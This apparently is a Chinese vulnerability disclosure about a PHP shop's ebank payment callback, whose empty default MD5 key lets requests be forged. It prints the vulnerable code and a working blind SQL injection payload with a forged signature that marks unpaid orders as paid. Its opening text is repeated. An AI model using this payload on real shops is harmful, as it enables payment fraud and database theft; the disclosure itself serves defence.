### 简要描述: 默认配置验证绕过 ### 详细说明: /include/plugin/payway/ebank/Receive.php中 ebank_md5 默认为空 ,可以生成sign绕过 ``` include('../../../../common.php'); $cache_payway = cache::get('payway'); $payway = unserialize($cache_payway['ebank']['payway_config']); $key = $payway['ebank_md5']; //默认为空 $v_oid =trim($_POST['v_oid']); $v_pmode =trim($_POST['v_pmode']); $v_pstatus =trim($_POST['v_pstatus']); $v_pstring =trim($_POST['v_pstring']); $v_amount =trim($_POST['v_amount']); $v_moneytype =trim($_POST['v_moneytype']); $remark1 =trim($_POST['remark1']); $remark2 =trim($_POST['remark2']); $v_md5str =trim($_POST['v_md5str']); /** * 重新计算md5的值 */ $md5string=strtoupper(md5($v_oid.$v_pstatus.$v_amount.$v_moneytype.$key));//之间连接生成md5,里面变量全可控 /** * 判断返回信息,如果支付成功,并且支付结果可信,则做进一步的处理 */ if ($v_md5str==$md5string) { //$_v_md5str也是可控 if($v_pstatus=="20") { $info = $db->pe_select('order', array('order_id'=>$v_oid));//$v_oid未再验证。 if ($info['order_state'] == 'notpay') { $order['order_outid'] = $v_pmode;...
### 简要描述: 默认配置验证绕过 ### 详细说明: /include/plugin/payway/ebank/Receive.php中 ebank_md5 默认为空 ,可以生成sign绕过 ``` include('../../../../common.php'); $cache_payway = cache::get('payway'); $payway = unserialize($cache_payway['ebank']['payway_config']); $key = $payway['ebank_md5']; //默认为空 $v_oid =trim($_POST['v_oid']); $v_pmode =trim($_POST['v_pmode']); $v_pstatus =trim($_POST['v_pstatus']); $v_pstring =trim($_POST['v_pstring']); $v_amount =trim($_POST['v_amount']); $v_moneytype =trim($_POST['v_moneytype']); $remark1 =trim($_POST['remark1']); $remark2 =trim($_POST['remark2']); $v_md5str =trim($_POST['v_md5str']); /** * 重新计算md5的值 */ $md5string=strtoupper(md5($v_oid.$v_pstatus.$v_amount.$v_moneytype.$key));//之间连接生成md5,里面变量全可控 /** * 判断返回信息,如果支付成功,并且支付结果可信,则做进一步的处理 */ if ($v_md5str==$md5string) { //$_v_md5str也是可控 if($v_pstatus=="20") { $info = $db->pe_select('order', array('order_id'=>$v_oid));//$v_oid未再验证。 if ($info['order_state'] == 'notpay') { $order['order_outid'] = $v_pmode; $order['order_payway'] = 'ebank'; $order['order_state'] = 'paid'; $order['order_ptime'] = time(); $db->pe_update('order', array('order_id'=>$v_oid), $order); pe_success('订单支付成功...'); } } else { echo "支付失败"; } } ``` ### 漏洞证明: $md5string=strtoupper(md5($v_oid.$v_pstatus.$v_amount.$v_moneytype.$key)); 请求时,用这个生成一个 MD5字符串,作为$v_md5str传入,另v_pstatus为20。 先生成一个订单,然后构造发生请求 v_oid=1409290002' and substring(user(),1,1)=char(114) %23&v_pstatus=20&v_md5str=DEFD6AA06AA4104E7FBFE8507BB0A9D1 判断数据库第一个位ascii码,如果是114,订单会支付成功。 [<img src="https://images.seebug.org/upload/201409/29182629ed3f58dc88c811d5d96a577c539cf207.png" alt="QQ截图20140929182445.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/29182629ed3f58dc88c811d5d96a577c539cf207.png) 数据库更新成功 [<img src="https://images.seebug.org/upload/201409/29182714c67e6acc6a30dac90a3d9c33afa9308a.png" alt="QQ截图20140929182426.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/29182714c67e6acc6a30dac90a3d9c33afa9308a.png) 显示 [<img src="https://images.seebug.org/upload/201409/2918281028f16ade69ee1059617f0b805fbe9947.png" alt="QQ截图20140929182737.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/2918281028f16ade69ee1059617f0b805fbe9947.png) 假如判断是不是115,因为不是,所以 [<img src="https://images.seebug.org/upload/201409/29183138d153dfaa848677d5153f537e2dd30bde.png" alt="QQ截图20140929183123.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/29183138d153dfaa848677d5153f537e2dd30bde.png) [<img src="https://images.seebug.org/upload/201409/29182932e92b206869b4242922f18a9845d65415.png" alt="QQ截图20140929182530.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/29182932e92b206869b4242922f18a9845d65415.png) 没有进行更新操作,没有支付
